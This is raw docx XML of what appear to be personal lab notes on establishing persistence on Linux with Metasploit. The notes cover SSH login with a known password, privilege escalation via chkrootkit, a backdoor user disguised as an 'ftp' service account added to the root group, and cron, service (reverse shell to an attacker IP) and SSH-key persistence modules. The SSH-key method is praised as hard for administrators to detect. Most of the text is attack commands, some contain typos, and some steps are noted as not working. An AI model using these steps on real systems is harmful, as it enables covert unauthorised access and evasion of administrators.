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7A77" w14:textId="30A5DFD7" w:rsidR="00853ABF" w:rsidRDefault="007A4D03">
      <w:r w:rsidRPr="007A4D03">
        <w:t xml:space="preserve">Establishing Persistence </w:t>
      </w:r>
      <w:r w:rsidR="008216C8">
        <w:t>o</w:t>
      </w:r>
      <w:r w:rsidRPr="007A4D03">
        <w:t>n Linux</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BAEB6E7" w14:textId="77777777" w:rsidR="007A4D03" w:rsidRDefault="007A4D03"/>
    <w:p w14:paraId="0237F9BB" w14:textId="6731653D" w:rsidR="00C04834" w:rsidRDefault="00C04834">
      <w:r>
        <w:t>Keep access to the system across restart, change password etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AFA5144" w14:textId="2E597BF2" w:rsidR="00C04834" w:rsidRDefault="00C04834">
      <w:r>
        <w:t>Depend upon target configuration in the Linux.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A36670" w14:textId="77777777" w:rsidR="00C82367" w:rsidRDefault="00C82367" w:rsidP="00C82367">
      <w:r>
        <w:t>inorder to use the persistence module we have the root privs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B563E05" w14:textId="77777777" w:rsidR="00C04834" w:rsidRDefault="00C04834"/>
    <w:p w14:paraId="7A8EB143" w14:textId="2A874169" w:rsidR="00C04834" w:rsidRPr="00FC0C2A" w:rsidRDefault="00FC0C2A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC0C2A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DEMO:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="710FBD26" w14:textId="77777777" w:rsidR="00FC0C2A" w:rsidRDefault="00FC0C2A"/>
    <w:p w14:paraId="5BE6572B" w14:textId="60EC6317" w:rsidR="002C7765" w:rsidRDefault="002C7765">
      <w:r>
        <w:t>Ifconfig</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E68E0B" w14:textId="4A6B8DD6" w:rsidR="002C7765" w:rsidRDefault="002C7765">
      <w:r>
        <w:t>Service postgresql start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF558E6" w14:textId="73EE0396" w:rsidR="002C7765" w:rsidRDefault="002C7765">
      <w:r>
        <w:t>Msfconsole -q</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="350D791F" w14:textId="10F4A479" w:rsidR="002C7765" w:rsidRDefault="002C7765">
      <w:r>
        <w:t>Workspace -a l</w:t>
      </w:r>
      <w:r w:rsidR="00C82367">
        <w:t>inux</w:t>
      </w:r>
      <w:r>
        <w:t>_per</w:t>
      </w:r>
      <w:r w:rsidR="00C82367">
        <w:t>sis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="170FDE1F" w14:textId="6B6548DB" w:rsidR="00ED5F00" w:rsidRDefault="00ED5F00">
      <w:r>
        <w:t>Setg RHOSTS target_ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A7DDD5" w14:textId="77777777" w:rsidR="00ED5F00" w:rsidRDefault="00ED5F00"/>
    <w:p w14:paraId="4A33870B" w14:textId="079CF552" w:rsidR="00ED5F00" w:rsidRDefault="00ED5F00">
      <w:r>
        <w:t>Search ssh_login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C4F8579" w14:textId="6CAD01CE" w:rsidR="00ED5F00" w:rsidRDefault="00ED5F00">
      <w:r>
        <w:t>Use(index no)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="464CC42D" w14:textId="2ABE2EC6" w:rsidR="00ED5F00" w:rsidRDefault="00ED5F00">
      <w:r>
        <w:t>Options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BFBE792" w14:textId="4CBEFE4C" w:rsidR="00ED5F00" w:rsidRDefault="00ED5F00">
      <w:r>
        <w:t>Set USERNAME Jackie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3748742D" w14:textId="3243AB85" w:rsidR="00ED5F00" w:rsidRDefault="00ED5F00">
      <w:r>
        <w:t>Set PASSWORD password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5190A34B" w14:textId="0D0E55B2" w:rsidR="00ED5F00" w:rsidRDefault="00ED5F00">
      <w:r>
        <w:t>Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD48D3F" w14:textId="1BFFAD2F" w:rsidR="00ED5F00" w:rsidRDefault="00ED5F00">
      <w:r>
        <w:t>#give command shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3302167D" w14:textId="77777777" w:rsidR="00ED5F00" w:rsidRDefault="00ED5F00"/>
    <w:p w14:paraId="23F10E0F" w14:textId="443BEA35" w:rsidR="00ED5F00" w:rsidRDefault="00ED5F00">
      <w:r>
        <w:t>Background</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E642C5" w14:textId="59F3DC76" w:rsidR="00ED5F00" w:rsidRDefault="00ED5F00">
      <w:r>
        <w:t xml:space="preserve"># upgrade to meterpreter session </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="513191DA" w14:textId="03209817" w:rsidR="00ED5F00" w:rsidRDefault="00ED5F00">
      <w:r>
        <w:t>Sessions -u id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D0C6E2" w14:textId="33C26842" w:rsidR="00ED5F00" w:rsidRDefault="00ED5F00">
      <w:r>
        <w:t>Sessions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63116A06" w14:textId="4F0E4874" w:rsidR="00ED5F00" w:rsidRDefault="00ED5F00">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>#elevate the prives</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4953CE94" w14:textId="77777777" w:rsidR="00ED5F00" w:rsidRDefault="00ED5F00"/>
    <w:p w14:paraId="4BD06BBE" w14:textId="6181D9BE" w:rsidR="00ED5F00" w:rsidRDefault="00ED5F00">
      <w:r>
        <w:t>Seach chkrootkit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="715F3A1B" w14:textId="25924D14" w:rsidR="00ED5F00" w:rsidRDefault="00ED5F00">
      <w:r>
        <w:t>Use (index no)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B1CFCE5" w14:textId="14EB4ACC" w:rsidR="00ED5F00" w:rsidRDefault="00ED5F00">
      <w:r>
        <w:t>Options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F11E891" w14:textId="7FDEB4BF" w:rsidR="00ED5F00" w:rsidRDefault="00ED5F00">
      <w:r>
        <w:t>Set SESSION  id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D0B6797" w14:textId="02C7D246" w:rsidR="00ED5F00" w:rsidRDefault="00ED5F00">
      <w:r>
        <w:t>Set CHKROOTKIT /bin/chkrootkit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3065F312" w14:textId="6804C435" w:rsidR="00ED5F00" w:rsidRDefault="00ED5F00">
      <w:r>
        <w:t>Set LHOSTS attacker ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B88DD9" w14:textId="355A6FD9" w:rsidR="00ED5F00" w:rsidRDefault="00ED5F00">
      <w:r>
        <w:t>Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CDF4302" w14:textId="19A191B0" w:rsidR="00ED5F00" w:rsidRDefault="009F642A">
      <w:r>
        <w:t># get command shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4001A0F4" w14:textId="77777777" w:rsidR="00ED5F00" w:rsidRDefault="00ED5F00"/>
    <w:p w14:paraId="5DBD6085" w14:textId="7A73CC54" w:rsidR="009F642A" w:rsidRDefault="009F642A">
      <w:r>
        <w:t>Background</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A73A1C" w14:textId="77777777" w:rsidR="009F642A" w:rsidRDefault="009F642A"/>
    <w:p w14:paraId="247E6D78" w14:textId="03DD11B9" w:rsidR="009F642A" w:rsidRDefault="009F642A">
      <w:r>
        <w:t>#now this is privs user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D08F0C" w14:textId="0CFFBAF8" w:rsidR="009F642A" w:rsidRDefault="009F642A">
      <w:r>
        <w:t>Sessions -u id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B60AE3" w14:textId="418243D1" w:rsidR="009F642A" w:rsidRDefault="009F642A">
      <w:r>
        <w:t># upgrade to meterrpreter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FABD282" w14:textId="77777777" w:rsidR="009F642A" w:rsidRDefault="009F642A"/>
    <w:p w14:paraId="684805DD" w14:textId="5FC6EB08" w:rsidR="009F642A" w:rsidRDefault="009F642A">
      <w:r>
        <w:t>Sessions id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27EFD0B2" w14:textId="6ADEF8AD" w:rsidR="00FC0C2A" w:rsidRDefault="009F642A">
      <w:r>
        <w:t xml:space="preserve"># meterpreter session </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630F55F2" w14:textId="77777777" w:rsidR="009F642A" w:rsidRDefault="009F642A"/>
    <w:p w14:paraId="4A959E39" w14:textId="447224AB" w:rsidR="009F642A" w:rsidRDefault="009F642A">
      <w:r>
        <w:t>Getuid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB3A981" w14:textId="34902D23" w:rsidR="009F642A" w:rsidRDefault="009F642A">
      <w:r>
        <w:t>Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F562FC0" w14:textId="72A10220" w:rsidR="009F642A" w:rsidRDefault="009F642A">
      <w:r>
        <w:t>/bin/bash -i</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7125ADB5" w14:textId="0791E368" w:rsidR="009F642A" w:rsidRDefault="009F642A">
      <w:r>
        <w:t>Whoami</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BBEB51E" w14:textId="77777777" w:rsidR="009F642A" w:rsidRDefault="009F642A"/>
    <w:p w14:paraId="2B7208D9" w14:textId="0A74ABD7" w:rsidR="009F642A" w:rsidRDefault="00755B95">
      <w:r>
        <w:t># inorder to use the persistence module we have the root privs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="127D6450" w14:textId="77777777" w:rsidR="00755B95" w:rsidRDefault="00755B95"/>
    <w:p w14:paraId="0F90B6E7" w14:textId="5FB1866B" w:rsidR="00755B95" w:rsidRDefault="00755B95">
      <w:r>
        <w:t>Background</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C14D5AE" w14:textId="77777777" w:rsidR="00755B95" w:rsidRDefault="00755B95"/>
    <w:p w14:paraId="6D721B9D" w14:textId="34B7763C" w:rsidR="00755B95" w:rsidRDefault="00755B95"/>
    <w:p w14:paraId="10C05909" w14:textId="7A57C18F" w:rsidR="00755B95" w:rsidRPr="00755B95" w:rsidRDefault="00755B95">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00755B95">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Manual:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="674CAB5E" w14:textId="35B8A3B4" w:rsidR="00755B95" w:rsidRDefault="00755B95">
      <w:r>
        <w:t>Create backdoor user, required access when we required.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596270F2" w14:textId="0B3F248D" w:rsidR="00755B95" w:rsidRDefault="00755B95">
      <w:r>
        <w:t>Only work if server runs ssh or remote access protocol.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A19A25" w14:textId="77777777" w:rsidR="005B71A8" w:rsidRDefault="005B71A8"/>
    <w:p w14:paraId="79EE32A1" w14:textId="368F928C" w:rsidR="005B71A8" w:rsidRDefault="005B71A8">
      <w:r>
        <w:t># in meterpreter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C87AC11" w14:textId="77777777" w:rsidR="005B71A8" w:rsidRDefault="005B71A8"/>
    <w:p w14:paraId="3B9698C8" w14:textId="2A4CF1B2" w:rsidR="005B71A8" w:rsidRDefault="005B71A8">
      <w:r>
        <w:t>Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D67D7AB" w14:textId="0B690776" w:rsidR="005B71A8" w:rsidRDefault="005B71A8">
      <w:r>
        <w:t>/bin/bash -i</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FBBA15E" w14:textId="11140EBE" w:rsidR="005B71A8" w:rsidRDefault="005B71A8">
      <w:r>
        <w:t>Cat etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="417525DC" w14:textId="3C64CDC1" w:rsidR="005B71A8" w:rsidRDefault="005B71A8">
      <w:r>
        <w:t># creating backdoor user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4117DC60" w14:textId="25A20DD2" w:rsidR="005B71A8" w:rsidRDefault="005B71A8">
      <w:r>
        <w:t># set the username that is difficult to catch. Look like service account</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D726D98" w14:textId="77777777" w:rsidR="005B71A8" w:rsidRDefault="005B71A8"/>
    <w:p w14:paraId="0B117F37" w14:textId="595D2D7E" w:rsidR="005B71A8" w:rsidRDefault="005B71A8">
      <w:r>
        <w:t xml:space="preserve">Useradd -m ftp -s /bin/bash </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F95DEAD" w14:textId="1026D44A" w:rsidR="006A2693" w:rsidRDefault="006A2693">
      <w:r>
        <w:t># the name of user is ftp ,you  can also specifiy the home directory for the user. After -m flag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01425F82" w14:textId="77777777" w:rsidR="006A2693" w:rsidRDefault="006A2693"/>
    <w:p w14:paraId="6F40E622" w14:textId="46B61744" w:rsidR="005B71A8" w:rsidRDefault="005B71A8">
      <w:r>
        <w:t># to create password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41405A22" w14:textId="13928BC5" w:rsidR="005B71A8" w:rsidRDefault="005B71A8">
      <w:r>
        <w:t>Password ftp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0277E4F0" w14:textId="77777777" w:rsidR="005B71A8" w:rsidRDefault="005B71A8"/>
    <w:p w14:paraId="791DDC07" w14:textId="382AB617" w:rsidR="005B71A8" w:rsidRDefault="005B71A8">
      <w:r>
        <w:t>Cat /etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF117CC" w14:textId="3CA8034C" w:rsidR="005B71A8" w:rsidRDefault="005B71A8"/>
    <w:p w14:paraId="74EA5CA0" w14:textId="0D9BE7AB" w:rsidR="005B71A8" w:rsidRDefault="005B71A8">
      <w:r>
        <w:t xml:space="preserve">Groups </w:t>
      </w:r>
      <w:r w:rsidR="006A2693">
        <w:t>root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14957D2B" w14:textId="77777777" w:rsidR="005B71A8" w:rsidRDefault="005B71A8"/>
    <w:p w14:paraId="15A91E89" w14:textId="43B82B27" w:rsidR="005B71A8" w:rsidRDefault="005B71A8">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t># add the ftp user to the root group</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15445092" w14:textId="3AA88F30" w:rsidR="005B71A8" w:rsidRDefault="005B71A8">
      <w:r>
        <w:t>Usermd -aG root ftp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C942B63" w14:textId="77777777" w:rsidR="006A2693" w:rsidRDefault="006A2693"/>
    <w:p w14:paraId="199C961C" w14:textId="7F32A5E6" w:rsidR="005B71A8" w:rsidRDefault="005B71A8">
      <w:r>
        <w:t>Groups ftp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63FA33FB" w14:textId="11B1EE84" w:rsidR="005B71A8" w:rsidRDefault="005B71A8">
      <w:r>
        <w:t xml:space="preserve"># it shows that it is part of </w:t>
      </w:r>
      <w:r w:rsidR="00C82367">
        <w:t>which</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> group</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="272931F4" w14:textId="77777777" w:rsidR="005B71A8" w:rsidRDefault="005B71A8"/>
    <w:p w14:paraId="0459D4A7" w14:textId="2896D278" w:rsidR="005B71A8" w:rsidRPr="006A2693" w:rsidRDefault="006A2693">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A2693">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Change that this user </w:t>
      </w:r>
      <w:r w:rsidR="000F36F7" w:rsidRPr="006A2693">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>has</w:t>
      </w:r>
      <w:r w:rsidRPr="006A2693">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> just created</w:t>
      </w:r>
      <w:r w:rsidR="000F36F7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> recently</w:t>
      </w:r>
      <w:r w:rsidRPr="006A2693">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="787AB2EC" w14:textId="77777777" w:rsidR="006A2693" w:rsidRDefault="006A2693"/>
    <w:p w14:paraId="249E1BF4" w14:textId="794F9D82" w:rsidR="006A2693" w:rsidRDefault="006A2693">
      <w:r>
        <w:t>Usermod -u 15 ftp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3861BE94" w14:textId="7217EF07" w:rsidR="006A2693" w:rsidRDefault="006A2693">
      <w:r>
        <w:t># it change the user id to 15 of ftp user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1068EE95" w14:textId="3F32FCF7" w:rsidR="006A2693" w:rsidRDefault="006A2693">
      <w:r>
        <w:t>Cat /etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C8BF8C" w14:textId="77777777" w:rsidR="005B71A8" w:rsidRDefault="005B71A8"/>
    <w:p w14:paraId="0867845D" w14:textId="6A9F4C46" w:rsidR="00EC076A" w:rsidRPr="00EC076A" w:rsidRDefault="00EC076A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC076A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Persistence module:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C77F84" w14:textId="77777777" w:rsidR="005B71A8" w:rsidRDefault="005B71A8"/>
    <w:p w14:paraId="7FC33116" w14:textId="1B39DEC6" w:rsidR="00EC076A" w:rsidRDefault="00EC076A">
      <w:r>
        <w:t>Search platform:linux persistence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F5BF55" w14:textId="0BDAA299" w:rsidR="00EC076A" w:rsidRPr="00C82367" w:rsidRDefault="00EC076A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C82367">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use (apt_package_manager_</w:t>
      </w:r>
      <w:r w:rsidRPr="00C82367">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> persistence</w:t>
      </w:r>
      <w:r w:rsidRPr="00C82367">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="036786D5" w14:textId="35AC491C" w:rsidR="00D16049" w:rsidRDefault="00EC076A">
      <w:r>
        <w:t>#not use it</w:t>
      </w:r>
      <w:r w:rsidR="00D16049">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="217F830F" w14:textId="77777777" w:rsidR="00EC076A" w:rsidRDefault="00EC076A"/>
    <w:p w14:paraId="1BF07CB9" w14:textId="456B2763" w:rsidR="00EC076A" w:rsidRPr="00396AB2" w:rsidRDefault="00EC076A" w:rsidP="00EC076A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00396AB2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use (</w:t>
      </w:r>
      <w:r w:rsidRPr="00396AB2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>cron</w:t>
      </w:r>
      <w:r w:rsidRPr="00396AB2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>_ persistence)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4837B390" w14:textId="484B605C" w:rsidR="00EC076A" w:rsidRDefault="00EC076A">
      <w:r>
        <w:t># set up cron job that connect to handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F6DB545" w14:textId="3DD3CAB8" w:rsidR="00EC076A" w:rsidRDefault="00EC076A">
      <w:r>
        <w:t># cron job are easily detected by the administrator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17FECD97" w14:textId="77777777" w:rsidR="00EC076A" w:rsidRDefault="00EC076A"/>
    <w:p w14:paraId="209AA758" w14:textId="504A9061" w:rsidR="00EC076A" w:rsidRDefault="00EC076A">
      <w:r>
        <w:t>Show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D86E14F" w14:textId="247FEEB1" w:rsidR="00EC076A" w:rsidRDefault="00396AB2">
      <w:r>
        <w:t>Set Session ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7927AA07" w14:textId="29D67FB4" w:rsidR="00396AB2" w:rsidRDefault="00396AB2">
      <w:r>
        <w:t>Set  LPORT 4422</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57820D50" w14:textId="073E9307" w:rsidR="00396AB2" w:rsidRDefault="00396AB2">
      <w:r>
        <w:t># set it to one which not in use</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="389D7EC9" w14:textId="04776B32" w:rsidR="00396AB2" w:rsidRDefault="00396AB2">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t># it doesnot work</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E23C7D" w14:textId="77777777" w:rsidR="00396AB2" w:rsidRDefault="00396AB2"/>
    <w:p w14:paraId="1765E344" w14:textId="77777777" w:rsidR="00396AB2" w:rsidRDefault="00396AB2"/>
    <w:p w14:paraId="589815A7" w14:textId="19ED24CC" w:rsidR="00EC076A" w:rsidRPr="00396AB2" w:rsidRDefault="00396AB2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00396AB2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>service</w:t>
      </w:r>
      <w:r w:rsidRPr="00396AB2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>_ persistence)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3452ACBB" w14:textId="2730E5D0" w:rsidR="00396AB2" w:rsidRDefault="00396AB2">
      <w:r>
        <w:t>Show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D6308AC" w14:textId="4597DFE1" w:rsidR="00EC076A" w:rsidRDefault="00396AB2">
      <w:r>
        <w:t>Set session id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AEA72A1" w14:textId="4CC2946E" w:rsidR="00396AB2" w:rsidRDefault="00396AB2">
      <w:r>
        <w:t>Set payload cmd/unix/reverse_python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FABEBBE" w14:textId="217F8BA7" w:rsidR="00396AB2" w:rsidRDefault="00396AB2">
      <w:r>
        <w:t>Set LHOST attacker_ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48473871" w14:textId="791EE1B5" w:rsidR="00396AB2" w:rsidRDefault="00396AB2">
      <w:r>
        <w:t>Set LPORT 4422</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E036828" w14:textId="623E8F8A" w:rsidR="00396AB2" w:rsidRDefault="00396AB2">
      <w:r>
        <w:t>Info</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B2DCCAD" w14:textId="77777777" w:rsidR="00396AB2" w:rsidRDefault="00396AB2" w:rsidP="00396AB2">
      <w:r>
        <w:t># it doesnot work</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="798AB588" w14:textId="77777777" w:rsidR="00396AB2" w:rsidRDefault="00396AB2"/>
    <w:p w14:paraId="5609C116" w14:textId="77777777" w:rsidR="00EC076A" w:rsidRDefault="00EC076A"/>
    <w:p w14:paraId="02360CE7" w14:textId="44BAB8FA" w:rsidR="00755B95" w:rsidRPr="00396AB2" w:rsidRDefault="00396AB2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00396AB2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>RECOMMMANDED:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4CDDC1" w14:textId="02474AF2" w:rsidR="00396AB2" w:rsidRDefault="00D32EBC">
      <w:r w:rsidRPr="00D32EBC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t># it is very difficult to detect</w:t>
      </w:r>
      <w:r w:rsidR="00BD7D95">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>, because we are not creating the cron job or service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="277BA4BF" w14:textId="06F70C69" w:rsidR="00396AB2" w:rsidRDefault="00396AB2">
      <w:r>
        <w:t>Use(sshkey_persistence)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1781EEFD" w14:textId="3B401232" w:rsidR="00396AB2" w:rsidRDefault="00396AB2">
      <w:r>
        <w:t># set private and public ssh key add public key to home of each user and provide us with key  to access the system(any user).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B73B69D" w14:textId="77777777" w:rsidR="00396AB2" w:rsidRDefault="00396AB2"/>
    <w:p w14:paraId="544B0442" w14:textId="4EA049FD" w:rsidR="00396AB2" w:rsidRDefault="00396AB2">
      <w:r>
        <w:t>Options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3558A636" w14:textId="3B2F66B9" w:rsidR="00396AB2" w:rsidRDefault="00396AB2">
      <w:r>
        <w:t>Set CREATESSHFOLDER yes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF5489D" w14:textId="0F5C1B79" w:rsidR="00396AB2" w:rsidRDefault="00396AB2">
      <w:r>
        <w:t>Set session id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB678F0" w14:textId="43CA9AC5" w:rsidR="00396AB2" w:rsidRDefault="00396AB2">
      <w:r>
        <w:t>Info</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7861CC16" w14:textId="1B5A88D0" w:rsidR="00396AB2" w:rsidRDefault="00D32EBC">
      <w:r>
        <w:t>Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA055C9" w14:textId="24547E86" w:rsidR="00D32EBC" w:rsidRDefault="00D32EBC">
      <w:r>
        <w:t>Loot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E45E3BA" w14:textId="2B32EDB5" w:rsidR="00D32EBC" w:rsidRDefault="00D32EBC">
      <w:r>
        <w:t># to access private keys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF38127" w14:textId="77777777" w:rsidR="00D32EBC" w:rsidRDefault="00D32EBC"/>
    <w:p w14:paraId="4F69091F" w14:textId="66F1D9F2" w:rsidR="00D32EBC" w:rsidRDefault="00D32EBC">
      <w:r>
        <w:t>Cat  name_file_store_private_key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A636E7" w14:textId="3EEF7B52" w:rsidR="00D32EBC" w:rsidRDefault="00D32EBC">
      <w:r>
        <w:t>Copy it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="283E7F78" w14:textId="77777777" w:rsidR="00D32EBC" w:rsidRDefault="00D32EBC"/>
    <w:p w14:paraId="02D29965" w14:textId="7D460680" w:rsidR="00D32EBC" w:rsidRPr="00D32EBC" w:rsidRDefault="00D32EBC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D32EBC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>On another terminal:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E42DD3" w14:textId="7AF55582" w:rsidR="00D32EBC" w:rsidRDefault="005469CB">
      <w:r>
        <w:t>Vim ssh_key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="245F20D9" w14:textId="69A4E0F8" w:rsidR="005469CB" w:rsidRDefault="005469CB">
      <w:r>
        <w:t>#past private key</w:t>
      </w:r>
    </w:p>
